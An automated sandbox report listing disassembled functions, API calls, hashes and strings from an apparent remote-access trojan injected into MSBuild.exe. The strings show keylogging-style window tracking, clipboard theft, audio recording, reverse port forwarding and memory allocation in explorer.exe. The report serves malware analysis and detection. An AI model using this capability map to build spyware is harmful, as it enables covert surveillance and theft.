                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _free
                                          • String ID:
                                          • API String ID: 269201875-0
                                          • Opcode ID: 47079874d6611f76b22abc1c1892e8562d414d23f3395fd45a7677fdf32a9ec5
                                          • Instruction ID: d910990a8472ee08c0279d8077499983e41ff25138a9859a729e4309013b5263
                                          • Opcode Fuzzy Hash: 47079874d6611f76b22abc1c1892e8562d414d23f3395fd45a7677fdf32a9ec5
                                          • Instruction Fuzzy Hash: E2C17476D40204AFEB20DBA9CC83FDE77B8AB19705F14015AFE05EB283D6B49D458798
                                          APIs
                                            • Part of subcall function 004558A9: CreateFileW.KERNEL32(00000000,00000000,?,00455C84,?,?,00000000,?,00455C84,00000000,0000000C), ref: 004558C6
                                          • GetLastError.KERNEL32 ref: 00455CEF
                                          • __dosmaperr.LIBCMT ref: 00455CF6
                                          • GetFileType.KERNEL32(00000000), ref: 00455D02
                                          • GetLastError.KERNEL32 ref: 00455D0C
                                          • __dosmaperr.LIBCMT ref: 00455D15
                                          • CloseHandle.KERNEL32(00000000), ref: 00455D35
                                          • CloseHandle.KERNEL32(?), ref: 00455E7F
                                          • GetLastError.KERNEL32 ref: 00455EB1
                                          • __dosmaperr.LIBCMT ref: 00455EB8
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                          • String ID: H
                                          • API String ID: 4237864984-2852464175
                                          • Opcode ID: ad10cc44415123364ccf3ab0f87a2b5b2deaae059395c87e8052164914e7d7f7
                                          • Instruction ID: f4290dc4267d91ba683862cdaabef3013db21248f4240db41616def06e578eae
                                          • Opcode Fuzzy Hash: ad10cc44415123364ccf3ab0f87a2b5b2deaae059395c87e8052164914e7d7f7
                                          • Instruction Fuzzy Hash: D5A155329106049FDF19AF68DC617BE3BA0EB06325F14415EEC11EB392CB398D5ACB59
                                          APIs
                                          • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,0045405C,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00453E2F
                                          • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453EB2
                                          • __alloca_probe_16.LIBCMT ref: 00453EEA
                                          • MultiByteToWideChar.KERNEL32(00000001,00000001,?,00000001,00000000,\@E,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453F45
                                          • __alloca_probe_16.LIBCMT ref: 00453F94
                                          • MultiByteToWideChar.KERNEL32(00000001,00000009,00000001,00000000,00000000,00000000,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453F5C
                                            • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,004352BC,?,?,00438847,?,?,00000000,00476B50,?,0040DE62,004352BC,?,?,?,?), ref: 00446169
                                          • MultiByteToWideChar.KERNEL32(00000001,00000001,00000001,00000000,00000000,?,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453FD8
                                          • __freea.LIBCMT ref: 00454003
                                          • __freea.LIBCMT ref: 0045400F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                          • String ID: \@E
                                          • API String ID: 201697637-1814623452
                                          • Opcode ID: 347d6d77569ccb8731e03be0652f4f39992ef0e8e93efb01081f6886d5a4a2b8
                                          • Instruction ID: bd5a1837779a5f2dcb5c2ea5aeb828518df7829aba760434011a70bbc407b236
                                          • Opcode Fuzzy Hash: 347d6d77569ccb8731e03be0652f4f39992ef0e8e93efb01081f6886d5a4a2b8
                                          • Instruction Fuzzy Hash: E391F472E002069ADB209E65CC42AEFBBF59F09756F14052BFC01E7282D739DD89C768
                                          APIs
                                          • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,$C,0043EA24,?,?,PkGNG,0044AE9A,00000001,00000001,73E85006), ref: 0044ACA3
                                          • __alloca_probe_16.LIBCMT ref: 0044ACDB
                                          • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,PkGNG,0044AE9A,00000001,00000001,73E85006,?,?,?), ref: 0044AD29
                                          • __alloca_probe_16.LIBCMT ref: 0044ADC0
                                          • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,73E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0044AE23
                                          • __freea.LIBCMT ref: 0044AE30
                                            • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,004352BC,?,?,00438847,?,?,00000000,00476B50,?,0040DE62,004352BC,?,?,?,?), ref: 00446169
                                          • __freea.LIBCMT ref: 0044AE39
                                          • __freea.LIBCMT ref: 0044AE5E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                          • String ID: $C$PkGNG
                                          • API String ID: 3864826663-3740547665
                                          • Opcode ID: 362257cb831b64f560ca9c305cbafbf1ddd2a76c4c9bcde51592d12c0f33465e
                                          • Instruction ID: b5b01290aead076256688b5938d42e4b2a7c64905c3dece0b68445a47d4ef5f6
                                          • Opcode Fuzzy Hash: 362257cb831b64f560ca9c305cbafbf1ddd2a76c4c9bcde51592d12c0f33465e
                                          • Instruction Fuzzy Hash: 1F513A72680206AFFB258F64CC41EBF77AAEB44714F24462EFC14D6240EB38DC60875A
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _free
                                          • String ID: \&G$\&G$`&G
                                          • API String ID: 269201875-253610517
                                          • Opcode ID: bf6a2d62285109b65615641ef8a9ee438ca725d72dbf644c1fcc8e573ee560d0
                                          • Instruction ID: 0b3297c67b001fbc5a9f4fbe1fd197d652097ca420ae28a40b4f72db8b3ed5d1
                                          • Opcode Fuzzy Hash: bf6a2d62285109b65615641ef8a9ee438ca725d72dbf644c1fcc8e573ee560d0
                                          • Instruction Fuzzy Hash: 77610475900204AFDB20CFA9C882B9ABBF4EF05315F14416BED58EB342D774AD458B98
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: 65535$udp
                                          • API String ID: 0-1267037602
                                          • Opcode ID: c855b19cc43d9bec36cd86ac5f012ace8f0d54e169e32fa1a21da6d4488bf9b2
                                          • Instruction ID: ff24d6befd6f0703c902a6165bd45161ed4db0fb5f75d2635e7e580b9b2721aa
                                          • Opcode Fuzzy Hash: c855b19cc43d9bec36cd86ac5f012ace8f0d54e169e32fa1a21da6d4488bf9b2
                                          • Instruction Fuzzy Hash: EF51E7756093019FDB209B58E9057BB37A4AFC4755F08082FF881973A1E76DCCC1865E
                                          APIs
                                          • __Init_thread_footer.LIBCMT ref: 0040AD38
                                          • Sleep.KERNEL32(000001F4), ref: 0040AD43
                                          • GetForegroundWindow.USER32 ref: 0040AD49
                                          • GetWindowTextLengthW.USER32(00000000), ref: 0040AD52
                                          • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 0040AD86
                                          • Sleep.KERNEL32(000003E8), ref: 0040AE54
                                            • Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,00000000,0040B20A,00000000), ref: 0040A662
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                          • String ID: [${ User has been idle for $ minutes }$]
                                          • API String ID: 911427763-3954389425
                                          • Opcode ID: feb8edceca8c1d3b0438b79f4b5d8782787a457fd28da8b62aac7c6790c891ec
                                          • Instruction ID: 3d5ee5432c15115af2c0f1375ae13a0ba8112eb59c463c5c733e63bb31497985
                                          • Opcode Fuzzy Hash: feb8edceca8c1d3b0438b79f4b5d8782787a457fd28da8b62aac7c6790c891ec
                                          • Instruction Fuzzy Hash: 6D51B1316043419BD314FB21D846AAE7796AB84308F50093FF586A22E2EF7C9D45C69F
                                          APIs
                                          • GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 0040DB9A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: LongNamePath
                                          • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                          • API String ID: 82841172-425784914
                                          • Opcode ID: 05c2ad93f6cc2ee26ed5624d475cb04337695bae26b39c69aed6eb4faf56ef7b
                                          • Instruction ID: 0cc8b9c4d8a16f3fd89327f32322cd7e2fd47b59120d3573c9b2d8a81569e3eb
                                          • Opcode Fuzzy Hash: 05c2ad93f6cc2ee26ed5624d475cb04337695bae26b39c69aed6eb4faf56ef7b
                                          • Instruction Fuzzy Hash: FB414F715082019AC215FB61DC52DAEB3F8AE90718F10053FB546A60E2FFB8AE49C65F
                                          APIs
                                          • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A892
                                          • GetLastError.KERNEL32(?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A89F
                                          • __dosmaperr.LIBCMT ref: 0043A8A6
                                          • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A8D2
                                          • GetLastError.KERNEL32(?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A8DC
                                          • __dosmaperr.LIBCMT ref: 0043A8E3
                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D55,?), ref: 0043A926
                                          • GetLastError.KERNEL32(?,?,?,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A930
                                          • __dosmaperr.LIBCMT ref: 0043A937
                                          • _free.LIBCMT ref: 0043A943
                                          • _free.LIBCMT ref: 0043A94A
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                          • String ID:
                                          • API String ID: 2441525078-0
                                          • Opcode ID: 333218d4c374834d2f5605b8d1434d3a456e4a6d1d3d381f1630f1823c8abcb3
                                          • Instruction ID: 785efe6d9c8e3fffb8b85045f967b8474775cb8629fdf0d32462ae01257f7f2e
                                          • Opcode Fuzzy Hash: 333218d4c374834d2f5605b8d1434d3a456e4a6d1d3d381f1630f1823c8abcb3
                                          • Instruction Fuzzy Hash: FF31F57140420AFFDF01AFA5CC45DAF3B68EF09325F10021AF950662A1DB38CD21DB6A
                                          APIs
                                          • SetEvent.KERNEL32(?,?), ref: 004054BF
                                          • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040556F
                                          • TranslateMessage.USER32(?), ref: 0040557E
                                          • DispatchMessageA.USER32(?), ref: 00405589
                                          • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00474F78), ref: 00405641
                                          • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 00405679
                                            • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                          • String ID: CloseChat$DisplayMessage$GetMessage
                                          • API String ID: 2956720200-749203953
                                          • Opcode ID: 0cfa6036874a5bca0beebe56fa67ee0d4ba4c2ce27f22afbcff1deb0655a3de4
                                          • Instruction ID: c1940132788662b917c5ec79ff16bb55de46c7435784779dc5fc992d72e4b12f
                                          • Opcode Fuzzy Hash: 0cfa6036874a5bca0beebe56fa67ee0d4ba4c2ce27f22afbcff1deb0655a3de4
                                          • Instruction Fuzzy Hash: CE41A171604701ABCB14FB75DC5A86F37A9AB85704F40093EF916A36E1EF3C8905CB9A
                                          APIs
                                            • Part of subcall function 00417F2C: __EH_prolog.LIBCMT ref: 00417F31
                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,004660A4), ref: 00417DDC
                                          • CloseHandle.KERNEL32(00000000), ref: 00417DE5
                                          • DeleteFileA.KERNEL32(00000000), ref: 00417DF4
                                          • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00417DA8
                                            • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
                                          • String ID: 0VG$0VG$<$@$Temp
                                          • API String ID: 1704390241-2575729100
                                          • Opcode ID: 1c1b3640276c9f2484efac8a9a88c7dcef26998f5c3edd0453bd207f6b4608f6
                                          • Instruction ID: cfce1e327495ca125f9f778a73892d1ad62a3a088d665d9de3c725e9e650d499
                                          • Opcode Fuzzy Hash: 1c1b3640276c9f2484efac8a9a88c7dcef26998f5c3edd0453bd207f6b4608f6
                                          • Instruction Fuzzy Hash: 0E415F319002099BCB14FB62DC56AEE7775AF40318F50417EF506764E1EF7C1A8ACB99
                                          APIs
                                          • OpenClipboard.USER32 ref: 00416941
                                          • EmptyClipboard.USER32 ref: 0041694F
                                          • CloseClipboard.USER32 ref: 00416955
                                          • OpenClipboard.USER32 ref: 0041695C
                                          • GetClipboardData.USER32(0000000D), ref: 0041696C
                                          • GlobalLock.KERNEL32(00000000), ref: 00416975
                                          • GlobalUnlock.KERNEL32(00000000), ref: 0041697E
                                          • CloseClipboard.USER32 ref: 00416984
                                            • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                          • String ID: !D@
                                          • API String ID: 2172192267-604454484
                                          • Opcode ID: 014ab2952fb1720400378532343d04f3ca6c69c69b6d94fb269798378f0b3219
                                          • Instruction ID: 305b70c8a6b081cbeb1fc088e42579eafb4add048c4ccd3ac1cf7446a02d8759
                                          • Opcode Fuzzy Hash: 014ab2952fb1720400378532343d04f3ca6c69c69b6d94fb269798378f0b3219
                                          • Instruction Fuzzy Hash: CC015E31214301DFC714BB72DC09AAE77A5AF88742F40047EF906821E2DF38CC44CA69
                                          APIs
                                          • CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00413417
                                          • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00413425
                                          • GetFileSize.KERNEL32(?,00000000), ref: 00413432
                                          • UnmapViewOfFile.KERNEL32(00000000), ref: 00413452
                                          • CloseHandle.KERNEL32(00000000), ref: 0041345F
                                          • CloseHandle.KERNEL32(?), ref: 00413465
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: File$CloseHandleView$CreateMappingSizeUnmap
                                          • String ID:
                                          • API String ID: 297527592-0
                                          • Opcode ID: 1b52e587fb9d9e89c8408f811d16bdaf082f1bab315b69f0c216b55e30adf48b
                                          • Instruction ID: 9e0538afe5582c7c3c7070a3da709670e2bb39b60280b40541f30be5467d1837
                                          • Opcode Fuzzy Hash: 1b52e587fb9d9e89c8408f811d16bdaf082f1bab315b69f0c216b55e30adf48b
                                          • Instruction Fuzzy Hash: ED41E631108305BBD7109F25DC4AF6B3BACEF89726F10092AFA14D51A2DF38DA40C66E
                                          APIs
                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB1C
                                          • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB33
                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB40
                                          • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB4F
                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB60
                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB63
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Service$CloseHandle$Open$ControlManager
                                          • String ID:
                                          • API String ID: 221034970-0
                                          • Opcode ID: 06969d4054276dbf450069cd14adbb04630f9483e2dd0d38d9b092c5558579ee
                                          • Instruction ID: 6fbe0b082825830d9e24babaefac53afed48758aa8e56b4d18e4903ff4329a9c
                                          • Opcode Fuzzy Hash: 06969d4054276dbf450069cd14adbb04630f9483e2dd0d38d9b092c5558579ee
                                          • Instruction Fuzzy Hash: 41114C71901218AFD711AF64DCC4DFF3B7CDB42B62B000036FA05D2192DB289C46AAFA
                                          APIs
                                          • _free.LIBCMT ref: 00448135
                                            • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                            • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                          • _free.LIBCMT ref: 00448141
                                          • _free.LIBCMT ref: 0044814C
                                          • _free.LIBCMT ref: 00448157
                                          • _free.LIBCMT ref: 00448162
                                          • _free.LIBCMT ref: 0044816D
                                          • _free.LIBCMT ref: 00448178
                                          • _free.LIBCMT ref: 00448183
                                          • _free.LIBCMT ref: 0044818E
                                          • _free.LIBCMT ref: 0044819C
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast
                                          • String ID:
                                          • API String ID: 776569668-0
                                          • Opcode ID: 27d76b13a5ecae076ca6598a5b1433465caaf67949f0bdc0fbde8a5d49186781
                                          • Instruction ID: 63500befab30bf138fa449b3e81d3956d19e40097f86fc95f12732a98ce5ff4f
                                          • Opcode Fuzzy Hash: 27d76b13a5ecae076ca6598a5b1433465caaf67949f0bdc0fbde8a5d49186781
                                          • Instruction Fuzzy Hash: C211B67A500508BFEB01EF96C842CDD3BA5FF05359B0240AAFA588F222DA35DF509BC5
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Eventinet_ntoa
                                          • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$NG
                                          • API String ID: 3578746661-3604713145
                                          • Opcode ID: 4f065297b3db04d08fab799040971db11ee763eabe84935d17a6cb70e7b06ee3
                                          • Instruction ID: 71dfdc03858149a45142756d2b421c0b7bbb6d70992310a40494c7f1f0681c69
                                          • Opcode Fuzzy Hash: 4f065297b3db04d08fab799040971db11ee763eabe84935d17a6cb70e7b06ee3
                                          • Instruction Fuzzy Hash: 0051C131A042015BC614FB36C91AAAE37A5AB85344F40453FF906A76F1EF7C8985C7DE
                                          APIs
                                          • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,00456FFF), ref: 00455F27
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: DecodePointer
                                          • String ID: acos$asin$exp$log$log10$pow$sqrt
                                          • API String ID: 3527080286-3064271455
                                          • Opcode ID: 629998c7ca290600fade91f32205cb7004f8bc569fe6c3e827db03ba52e3cc78
                                          • Instruction ID: ff4fc8d1aadbe784407353d8516796ad37925c88dabf63da6293f70e8270e0de
                                          • Opcode Fuzzy Hash: 629998c7ca290600fade91f32205cb7004f8bc569fe6c3e827db03ba52e3cc78
                                          • Instruction Fuzzy Hash: 16519F71900909CBCF10CF58E9485BEBBB0FF49306FA14197D841A73A6DB399D298B1E
                                          APIs
                                          • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,PkGNG,0044BB31,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044B3FE
                                          • __fassign.LIBCMT ref: 0044B479
                                          • __fassign.LIBCMT ref: 0044B494
                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0044B4BA
                                          • WriteFile.KERNEL32(?,FF8BC35D,00000000,0044BB31,00000000,?,?,?,?,?,?,?,?,PkGNG,0044BB31,?), ref: 0044B4D9
                                          • WriteFile.KERNEL32(?,?,00000001,0044BB31,00000000,?,?,?,?,?,?,?,?,PkGNG,0044BB31,?), ref: 0044B512
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                          • String ID: PkGNG
                                          • API String ID: 1324828854-263838557
                                          • Opcode ID: e1ab2fdd82c1bf82b8ea5de4eaaa1e5c3a736621917fd27297e58c6e874c6116
                                          • Instruction ID: 24f44d390d373c30b0d8a34eda065edd0bccebe0da4884afe324d1cece3cc5ea
                                          • Opcode Fuzzy Hash: e1ab2fdd82c1bf82b8ea5de4eaaa1e5c3a736621917fd27297e58c6e874c6116
                                          • Instruction Fuzzy Hash: 0751D270900208AFDB10CFA8D885AEEFBF4EF09305F14856BE955E7292D734D941CBA9
                                          APIs
                                          • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 004174F5
                                            • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C49E
                                          • Sleep.KERNEL32(00000064), ref: 00417521
                                          • DeleteFileW.KERNEL32(00000000), ref: 00417555
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: File$CreateDeleteExecuteShellSleep
                                          • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                          • API String ID: 1462127192-2001430897
                                          • Opcode ID: 1f6a825730162cc8d70e4a327bcc3a42f02bec4a5cc2bca23683888e0af1c848
                                          • Instruction ID: 51d64fe7c8a5c54eac4555a52c350958ac4104e8f54c8767ba2a87230734c78e
                                          • Opcode Fuzzy Hash: 1f6a825730162cc8d70e4a327bcc3a42f02bec4a5cc2bca23683888e0af1c848
                                          • Instruction Fuzzy Hash: 1431307194011A9ADB04FB62DC96DED7779AF50309F40017EF606730E2EF785A8ACA9C
                                          APIs
                                          • GetCurrentProcess.KERNEL32(00472B14,00000000,004752D8,00003000,00000004,00000000,00000001), ref: 004073DD
                                          • GetCurrentProcess.KERNEL32(00472B14,00000000,00008000,?,00000000,00000001,00000000,00407656,C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe), ref: 0040749E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CurrentProcess
                                          • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir
                                          • API String ID: 2050909247-4242073005
                                          • Opcode ID: 539e8bced36223118afef646be0064b2910b8cfba0236f50484b60453eb32d25
                                          • Instruction ID: f630994b7aed3d2c1b9b8fa2b3e4f68b22e8b08ead4833dea6669ff7d567ef23
                                          • Opcode Fuzzy Hash: 539e8bced36223118afef646be0064b2910b8cfba0236f50484b60453eb32d25
                                          • Instruction Fuzzy Hash: 7031A471A04700ABD321FF65ED46F167BB8AB44305F10087EF515A6292E7B8B8448B6F
                                          APIs
                                          • _strftime.LIBCMT ref: 00401D50
                                            • Part of subcall function 00401A6D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                          • waveInUnprepareHeader.WINMM(00472A88,00000020,00000000,?), ref: 00401E02
                                          • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401E40
                                          • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401E4F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                          • String ID: %Y-%m-%d %H.%M$.wav$dMG$|MG
                                          • API String ID: 3809562944-243156785
                                          • Opcode ID: 056d7ed0179ee1e3bc41876d6f94bfa6cd5a524795bf822a31929a0c00ad1597
                                          • Instruction ID: 027c37fd5a1300b84eaed5fd93cda356eabc1c7fedb6cd9f381e221a57c36ff8
                                          • Opcode Fuzzy Hash: 056d7ed0179ee1e3bc41876d6f94bfa6cd5a524795bf822a31929a0c00ad1597
                                          • Instruction Fuzzy Hash: 383181315043019FC324EB21DD46A9A77A8EB84314F40443EF18DA21F2EFB89A49CB5E
                                          APIs
                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00410E6E
                                          • int.LIBCPMT ref: 00410E81
                                            • Part of subcall function 0040E0C1: std::_Lockit::_Lockit.LIBCPMT ref: 0040E0D2
